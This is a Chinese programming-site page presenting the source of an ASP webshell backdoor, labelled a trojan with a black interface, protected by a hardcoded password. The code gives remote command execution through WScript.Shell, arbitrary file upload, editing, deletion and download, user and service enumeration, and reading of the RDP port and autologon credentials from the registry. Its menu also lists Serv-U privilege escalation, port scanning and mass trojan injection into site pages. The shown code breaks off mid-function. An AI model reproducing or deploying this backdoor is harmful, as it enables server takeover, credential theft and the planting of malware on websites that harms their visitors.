程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> ASP編程 >> 關於ASP編程 >> 一款不錯的asp木馬 黑色界面

一款不錯的asp木馬 黑色界面

編輯:關於ASP編程
<%
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
UserPass="643617"                           '密碼
mName="BY:.尐飛"           '後門名字
Copyright="注:請勿用於非法用途,否則後果作者概不負責"       '版權

Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
sub ShowErr()
  If Err Then
    RRS"<br><a href='javascript:history.back()'><br> " & 
Err.Description & "</a><br>"
    Err.Clear:Response.Flush
  End If
end sub
Sub RRS(str)
    response.write(str)
End Sub
Function RePath(S)
  RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
  RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; 
charset=gb2312"">"
RRS"<title>"&mName1&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
RRS"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
RRS".C{background-color:#000000;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
RRS".am{color:#888;font-size:11px;}"
RRS"</style>"
RRS"<script language=javascript>function killErrors(){return true;}
window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""確認要執行此操作嗎?""))return 
true;else return false;}"
RRS"function runClock(){theTime = window.setTimeout(""runClock()"", 
100);var today = new Date();var display= today.toLocaleString
();window.status=""→"&AD&"  --""+display;}runClock();"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value = 
Folder;top.addrform.submit();}"
RRS"function FullForm(FName,FAction){top.hideform.FName.value = 
FName;if(FAction==""CopyFile""){DName = prompt(""請輸入復制到目標文件全
名稱"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFile""){DName = prompt(""請輸入移動到目標文件全名
稱"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""CopyFolder""){DName = prompt(""請輸入移動到目標文件夾全名稱
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFolder""){DName = prompt(""請輸入移動到目標文件夾全名稱
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""NewFolder""){DName = prompt(""請輸入要新建的文件夾全名
稱"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}
if(DName!=null){top.hideform.Action.value = 
FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"
RRS"</script>"
rrs "<body" 
If Action="" then RRS " scroll=no"
rrs ">"
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
  ObT(0,2) = "文件操作組件"
ObT(1,0) = "wscript.shell"
  ObT(1,2) = "命令行執行組件"
ObT(2,0) = "ADOX.Catalog"
  ObT(2,2) = "ACCESS建庫組件"
ObT(3,0) = "JRO.JetEngine"
  ObT(3,2) = "ACCESS壓縮組件"
ObT(4,0) = "Scripting.Dictionary" 
  ObT(4,2) = "數據流上傳輔助組件"
ObT(5,0) = "Adodb.connection"
  ObT(5,2) = "數據庫連接組件"
ObT(6,0) = "Adodb.Stream"
  ObT(6,2) = "數據流上傳組件"
ObT(7,0) = "SoftArtisans.FileUp"
  ObT(7,2) = "SA-FileUp 文件上傳組件"
ObT(8,0) = "LyfUpload.UploadFile"
  ObT(8,2) = "劉雲峰文件上傳組件"
ObT(9,0) = "Persits.Upload.1"
  ObT(9,2) = "ASPUpload 文件上傳組件"
ObT(10,0) = "JMail.SmtpMail"
  ObT(10,2) = "JMail 郵件收發組件"
ObT(11,0) = "CDONTS.NewMail"
  ObT(11,2) = "虛擬SMTP發信組件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
  ObT(12,2) = "SmtpMail發信組件"
ObT(13,0) = "Microsoft.XMLHTTP"
  ObT(13,2) = "數據傳輸組件"
For i=0 To 13
    Set T=Server.CreateObject(ObT(i,0))
    If -2147221005 <> Err Then
      IsObj=" √"
    Else
      IsObj=" ×"
      Err.Clear
    End If
    Set T=Nothing
    ObT(i,1)=IsObj
Next
If FolderPath<>"" then
  Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
  FolderPath=RootPath
  Session("FolderPath")=FolderPath
End if
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&""" 
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%'  border=0 cellpadding='0' 
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"' 
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址欄:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit' 
type='submit' value='轉到'> <input type='submit' value='刷新主窗口' 
onclick='FileFrame.location.reload()'>" 
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' 
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' 
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
if request("web")="admin" then
 Session("web2a2dmin") = UserPass
       URL()
  end if
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&""" 
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%'  border=0 cellpadding='0' 
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"' 
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址欄:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit' 
type='submit' value='轉到'> <input type='submit' value='刷新主窗口' 
onclick='FileFrame.location.reload()'>" 
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' 
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' 
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
Function MainMenu()
RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
RRS"<tr><td height='5'></td></tr>"
RRS"<tr><td><center><a href='"&SiteURL2&"' target='_blank'><font 
color=red>"&mName2&"</font></center></a><hr hight=1 width='100%'>"
RRS"</td></tr>"
If ObT(0,1)=" ×" Then
RRS"<tr><td height='24'>無權限</td></tr>"
Else
RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盤<div id=menu1 style=""width:100%;display='none'"" 
onmouseout=""menu1.style.display='none'"">"
Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder
("""&RePath(WWWRoot)&""")'>->站點根目錄</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath
(RootPath)&""")'>→本程序目錄</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Program 
Files"")'>→Program Files</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents 
and Settings\\All Users\\Documents"")'>->Documents</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents 
and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>-
>pcAnywhere</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents 
and Settings\\All Users\\「開始」菜單\\程序"")'>->開始 <b>→</b> 程序
<hr></a></td></tr>"
End If
RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>→
系統服務-用戶賬號</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=getTerminalInfo' 
target='FileFrame'>→終端端口-自動登錄</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ServerInfo' 
target='FileFrame'>→服務信息-組件支持</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'>
→執行CMD命令</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>
→端口掃描器</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'>→
Serv-u提權</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>→
讀取注冊表</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath
(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>→新建目錄
<hr></a></td></tr>"
RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>
→新建文本</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>→
上傳文件</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'>→查
找木馬</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>
→高級掛馬</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>
→批量清馬</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>
→批量替換</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>
→低級掛馬</a></b></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>→退出登
錄</a></td></tr>"
RRS"<tr><td align=center 
style='color:red'><hr>"&Copyright2&"</td></tr></table>"
RRS"</table>"
End Function
    Sub unPack(thePath)
        On Error Resume Next
        Server.ScriptTimeOut = 5000
        Dim rs, ws, str, conn, stream, connStr, theFolder
        str = Server.MapPath(".") & "\"
        Set rs = CreateObject("ADODB.RecordSet")
        Set stream = CreateObject("ADODB.Stream")
        Set conn = CreateObject("ADODB.Connection")
        connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data 
Source=" & thePath & ";"
        conn.Open connStr
        rs.Open "FileData", conn, 1, 1
        stream.Open
        stream.Type = 1
        Do Until rs.Eof
            theFolder = Left(rs("thePath"), InStrRev(rs
("thePath"), "\"))
            If fsoX.FolderExists(str & theFolder) = False 
Then
                createFolder(str & theFolder)
            End If
            stream.SetEos()
            stream.Write rs("fileContent")
            stream.SaveToFile str & rs("thePath"), 2
            rs.MoveNext
        Loop
        rs.Close
        conn.Close
        stream.Close
        Set ws = Nothing
        Set rs = Nothing
        Set stream = Nothing
        Set conn = Nothing
    End Sub
    Sub createFolder(thePath)
        Dim i
        i = Instr(thePath, "\")
        Do While i > 0
            If fsoX.FolderExists(Left(thePath, i)) = False 
Then
                fsoX.CreateFolder(Left(thePath, i - 1))
            End If
            If InStr(Mid(thePath, i + 1), "\") Then
                i = i + Instr(Mid(thePath, i + 1), "\")
             Else
                i = 0
            End If
        Loop
    End Sub
Function Course()
SI="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' 
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
統用戶與服務</td></tr>"
on error resume next
for each obj in getObject("WinNT://.")
err.clear
if OBJ.StartType="" then
SI=SI&"<tr>"
SI=SI&"<td height=""20"" bgcolor=""#FFFFFF""> "
SI=SI&obj.Name
SI=SI&"</td><td bgcolor=""#FFFFFF""> " 
SI=SI&"系統用戶(組)"
SI=SI&"</td></tr>"
SI0="<tr><td height=""20"" bgcolor=""#FFFFFF"" 
colspan=""2""> </td></tr>" 
end if
if OBJ.StartType=2 then lx="自動"
if OBJ.StartType=3 then lx="手動"
if OBJ.StartType=4 then lx="禁用"
if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
SI1=SI1&"<tr><td height=""20"" 
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" 
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" 
bgcolor=""#FFFFFF"" colspan=""2"">[啟動類型:"&lx&"]<font 
color=#FF0000> "&obj.path&"</font></td></tr>"
else
SI2=SI2&"<tr><td height=""20"" 
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" 
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" 
bgcolor=""#FFFFFF"" colspan=""2"">[啟動類型:"&lx&"]<font 
color=#3399FF> "&obj.path&"</font></td></tr>"
end if
next
RRS SI&SI0&SI1&SI2&"</table>"
End Function
Function ServerInfo()
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' 
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
務器組件信息</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200' 
bgcolor='#FFFFFF'>服務器名</td><td bgcolor='#FFFFFF'> </td><td 
bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
SI=SI&"<form method=post action='http://www.ip138.com/index.asp' 
name='ipform' target='_blank'><tr align='center'><td height='20' 
width='200' bgcolor='#FFFFFF'>服務器IP</td><td 
bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"
SI=SI&"<input type='text' name='ip' size='15' 
value='"&Request.ServerVariables("LOCAL_ADDR")
&"'style='border:0px'><input type='submit' value='查
詢'style='border:0px'><input type='hidden' name='action' 
value='2'></td></tr></form>"
SI=SI&"<tr align='center'><td height='20' width='200' 
bgcolor='#FFFFFF'>服務器時間</td><td bgcolor='#FFFFFF'> </td><td 
bgcolor='#FFFFFF'>"&now&" </td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200' 
bgcolor='#FFFFFF'>服務器CPU數量</td><td 
bgcolor='#FFFFFF'> </td><td 
bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")
&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200' 
bgcolor='#FFFFFF'>服務器操作系統</td><td 
bgcolor='#FFFFFF'> </td><td 
bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200' 
bgcolor='#FFFFFF'>WEB服務器版本</td><td 
bgcolor='#FFFFFF'> </td><td 
bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")
&"</td></tr>"
For i=0 To 13
SI=SI&"<tr align='center'><td height='20' width='200' 
bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)
&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
Next
RRS SI
End Function
Function DownFile(Path)
Response.Clear
Set OSM = CreateObject(ObT(6,0))
OSM.Open
OSM.Type = 1
OSM.LoadFromFile Path
sz=InstrRev(path,"\")+1
Response.AddHeader "Content-Disposition", "attachment; filename=" & 
Mid(path,sz)
Response.AddHeader "Content-Length", OSM.Size
Response.Charset = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite OSM.Read
Response.Flush
OSM.Close
Set OSM = Nothing
End Function
Function HTMLEncode(S)
  if not isnull(S) then
    S = replace(S, ">", ">")
    S = replace(S, "<", "<")
    S = replace(S, CHR(39), "'")
    S = replace(S, CHR(34), """)
    S = replace(S, CHR(20), " ")
    HTMLEncode = S
  end if
End Function
Function UpFile()
  If Request("Action2")="Post" Then
    Set U=new UPC : Set F=U.UA("LocalFile")
    UName=U.form("ToPath")
    If UName="" Or F.FileSize=0 then
      SI="<br>請輸入上傳的完全路徑後選擇一個文件上傳!"
    Else
        F.SaveAs UName
        If Err.number=0 Then
          SI="<center><br><br><br>文件"&UName&"上傳成功!</center>"
        End if
    End If
    Set F=nothing:Set U=nothing
    SI=SI&BackUrl
    RRS SI
    ShowErr()
    Response.End
  End If
    SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' 
align='center'>"
    SI=SI&"<form name='UpForm' method='post' action='"&URL&"?
Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
    SI=SI&"<tr><td>"
    SI=SI&"上傳路徑:<input name='ToPath' value='"&RRePath(Session
("FolderPath")&"\diy3.asp")&"' size='40'>"
    SI=SI&" <input name='LocalFile' type='file'  size='25'>"
    SI=SI&" <input type='submit' name='Submit' value='上傳'>"
    SI=SI&"</td></tr></form></table>"
  RRS SI
End Function
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "diy3.asp"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'>"
SI=SI&"SHELL路徑:<input name='SP' value='"&ShellPath&"' 
Style='width:70%'>  "
SI=SI&"<input class=c type='checkbox' name='wscript' 
value='yes'"&checked&">WScript.Shell"
SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input 
type='submit' value='執行'><textarea Style='width:100%;height:440;' 
class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
Set ws=Server.CreateObject("WScript.Shell")
Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea></form>"
RRS SI
End Function
if session("web2a2dmin")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("web2a2dmin")=UserPass
response.redirect url
else
 rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
請勿用於非法用途,否則後果自負!!!</font></b> <br><br><br><br><b><div 
align=center><font size='14' color='lime'>HACK by:漫步雲端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid 
#222;padding:22px;margin:100px;'><br><a href='"&SiteURL&"' 
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密碼:<input name='pass' type='password' size='22'> <input 
type='submit' value='登錄'><hr>"&Copyright&"</center>"
if instr(SI,SIC)<>0 then rrs sI
end if
response.end
end if
Dim T1
Class UPC
  Dim D1,D2
  Public Function Form(F)
    F=lcase(F)
    If D1.exists(F) then:Form=D1(F):else:Form="":end if
  End Function
  Public Function UA(F)
    F=lcase(F)
    If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
  End Function
  Private Sub Class_Initialize
  Dim 
TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
    set D1=CreateObject(ObT(4,0))
    if Request.TotalBytes<1 then Exit Sub
    set T1 = CreateObject(ObT(6,0))
    T1.Type = 1 : T1.Mode =3 : T1.Open
    T1.Write  Request.BinaryRead(Request.TotalBytes)
    T1.Position=0 : TDa =T1.Read : DStart = 1
    DEnd = LenB(TDa)
    set D2=CreateObject(ObT(4,0))
    vbCrlf = chrB(13) & chrB(10)
    set T2 = CreateObject(ObT(6,0))
    TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
    TLen = LenB (TSt)
    DStart=DStart+TLen+1
    while (DStart + 10) < DEnd
      DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
      T2.Type = 1 : T2.Mode =3 : T2.Open
      T1.Position = DStart
      T1.CopyTo T2,DIEnd-DStart
      T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
      TIn = T2.ReadText : T2.Close
      DStart = InStrB(DIEnd,TDa,TSt)
      FStart = InStr(22,TIn,"name=""",1)+6
      FEnd = InStr(FStart,TIn,"""",1)
      UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
      if InStr (45,TIn,"filename=""",1) > 0 then
        set TFL=new FIF
        FStart = InStr(FEnd,TIn,"filename=""",1)+10
        FEnd = InStr(FStart,TIn,"""",1)
        FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
        FEnd = InStr(FStart,TIn,vbCr)
        TFL.FileStart =DIEnd
        TFL.FileSize = DStart -DIEnd -3
        if not D2.Exists(UpName) then
          D2.add UpName,TFL
        end if
      else
        T2.Type =1 : T2.Mode =3 : T2.Open
        T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
        T2.Position = 0 : T2.Type = 2
        T2.Charset ="gb2312"
        SFV = T2.ReadText
        T2.Close
        if D1.Exists(UpName) then
          D1(UpName)=D1(UpName)&", "&SFV
        else
          D1.Add UpName,SFV
        end if
      end if
      DStart=DStart+TLen+1
    wend
    TDa=""
    set T2 =nothing
  End Sub
  Private Sub Class_Terminate
    if Request.TotalBytes>0 then
      D1.RemoveAll:D2.RemoveAll
      set D1=nothing:set D2=nothing
      T1.Close:set T1 =nothing
    end if
  End Sub
End Class
Class FIF
dim FileSize,FileStart
  Private Sub Class_Initialize
  FileSize = 0
  FileStart= 0
  End Sub
  Public function SaveAs(F)
  dim T3
  SaveAs=true
  if trim(F)="" or FileStart=0 then exit function
  set T3=CreateObject(ObT(6,0))
     T3.Mode=3 : T3.Type=1 : T3.Open
     T1.position=FileStart
     T1.copyto T3,FileSize
     T3.SaveToFile F,2
     T3.Close
     set T3=nothing
     SaveAs=false
   end function
End Class
Class LBF
  Dim CF
  Private Sub Class_Initialize
    SET CF=CreateObject(ObT(0,0))
  End Sub
  Private Sub Class_Terminate
    Set CF=Nothing
  End Sub
  Function ShowDriver()
    For Each D in CF.Drives
      RRS"   <a href='javascript:ShowFolder
("""&D.DriveLetter&":\\"")'>本地磁盤 ("&D.DriveLetter&":)</a><br>" 
    Next
  End Function
  Function Show1File(Path)
  Set FOLD=CF.GetFolder(Path)
  i=0
    SI="<table width='100%' border='0' cellspacing='0' 
cellpadding='0'><tr>"
  For Each F in FOLD.subfolders
    SI=SI&"<td height=10>"
    SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)
&""")' title=""打開""><font face='wingdings' 
size='6'>0</font>"&F.Name&"</a>" 
    SI=SI&" _<a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' 
class='am' title='復制'>復制</a>"
    SI=SI&"  <a href='javascript:FullForm("""&Replace
(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'  onclick='return yesok
()' class='am' title='刪除'>刪除</a>"
    SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""MoveFolder"")'  onclick='return yesok()' 
class='am' title='移動'>移動</a>"
    SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""DownFile"")'  onclick='return yesok()' 
class='am' title='下載'>下載</a></td>"
    i=i+1
    If i mod 3 = 0 then SI=SI&"</tr><tr>"
  Next
    SI=SI&"</tr><tr><td height=2></td></tr></table>"
    RRS SI &"<hr noshade color=""#CCCCCC"" size=1 color=""#"" />" : 
SI=""
  For Each L in Fold.files
    SI="<table width='100%' border='0' cellspacing='0' 
cellpadding='0'>"
    SI=SI&"<tr style='boungroup-color:#'>"
    SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath
(Path&"\"&L.Name)&""",""DownFile"");' title='下載'><font 
face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
    SI=SI&"<td width='40' align=""center""><a 
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""EditFile"")' class='am' title='編輯'>編輯</a></td>"
    SI=SI&"<td width='40' align=""center""><a 
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")' 
 onclick='return yesok()' class='am' title='刪除'>刪除</a></td>"
    SI=SI&"<td width='40' align=""center""><a 
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""CopyFile"")' class='am' title='復制'>復制</a></td>"
    SI=SI&"<td width='40' align=""center""><a 
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""MoveFile"")' class='am' title='移動'>移動</a></td>"    
    SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
    SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
    SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
    SI=SI&"</tr></table>"
    RRS SI:SI=""
  Next
  Set FOLD=Nothing
  End function
  Function DelFile(Path)
If CF.FileExists(Path) Then
CF.DeleteFile Path
SI="<center><br><br><br>文件 "&Path&" 刪除成功!</center>"
SI=SI&BackUrl
RRS SI
End If
  End Function
  Function EditFile(Path)
If Request("Action2")="Post" Then
Set T=CF.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
Set T=nothing
SI="<center><br><br><br>文件保存成功!</center>"
SI=SI&BackUrl
RRS SI
Response.End
End If
If Path<>"" Then
Set T=CF.opentextfile(Path, 1, False)
Txt=HTMLEncode(T.readall) 
T.close
Set T=Nothing
Else
Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件"
End If
SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' 
name='EditForm'>"
SI=SI&"<input name='Action' value='EditFile' Type='hidden'>"
SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>"
SI=SI&"<textarea name='Content' 
style='width:100%;height:450'>"&Txt&"</textarea><br>"
SI=SI&"<hr><input name='goback' type='button' value='返回' 
onclick='history.back();'>   <input name='reset' 
type='reset' value='重置'>   <input name='submit' 
type='submit' value='保存'></form>"
RRS SI
  End Function
  Function CopyFile(Path)
  Path = Split(Path,"||||")
    If CF.FileExists(Path(0)) and Path(1)<>"" Then
      CF.CopyFile Path(0),Path(1)
      SI="<center><br><br><br>文件"&Path(0)&"復制成功!</center>"
      SI=SI&BackUrl
      RRS SI 
    End If
  End Function
  Function MoveFile(Path)
  Path = Split(Path,"||||")
    If CF.FileExists(Path(0)) and Path(1)<>"" Then
      CF.MoveFile Path(0),Path(1)
      SI="<center><br><br><br>文件"&Path(0)&"移動成功!</center>"
      SI=SI&BackUrl
      RRS SI 
    End If
  End Function
  Function DelFolder(Path)
    If CF.FolderExists(Path) Then
      CF.DeleteFolder Path
      SI="<center><br><br><br>目錄"&Path&"刪除成功!</center>"
      SI=SI&BackUrl
      RRS SI
    End If
  End Function
  Function CopyFolder(Path)
  Path = Split(Path,"||||")
    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
      CF.CopyFolder Path(0),Path(1)
      SI="<center><br><br><br>目錄"&Path(0)&"復制成功!</center>"
      SI=SI&BackUrl
      RRS SI
    End If
  End Function
  Function MoveFolder(Path)
  Path = Split(Path,"||||")
    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
      CF.MoveFolder Path(0),Path(1)
      SI="<center><br><br><br>目錄"&Path(0)&"移動成功!</center>"
      SI=SI&BackUrl
      RRS SI
    End If
  End Function
  Function NewFolder(Path)
    If Not CF.FolderExists(Path) and Path<>"" Then
      CF.CreateFolder Path
      SI="<center><br><br><br>目錄"&Path&"新建成功!</center>"
      SI=SI&BackUrl
      RRS SI
    End If
  End Function
End Class
sub getTerminalInfo()
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, 
autoLoginPassword
terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal 
Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
RRS "終端服務端口及自動登錄<hr/><ol>"
If termPort = "" Or Err.Number <> 0 Then 
RRS"無法得到終端服務端口, 請檢查權限是否已經受到限制.<br/>"
 Else
RRS "當前終端服務端口: " & termPort & "<br/>"
End If
autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
RRS "系統自動登錄功能未開啟<br/>"
Else
autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
RRS "自動登錄的系統帳戶: " & autoLoginUsername & "<br>"
autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
If Err Then
Err.Clear
RRS "False"
End If
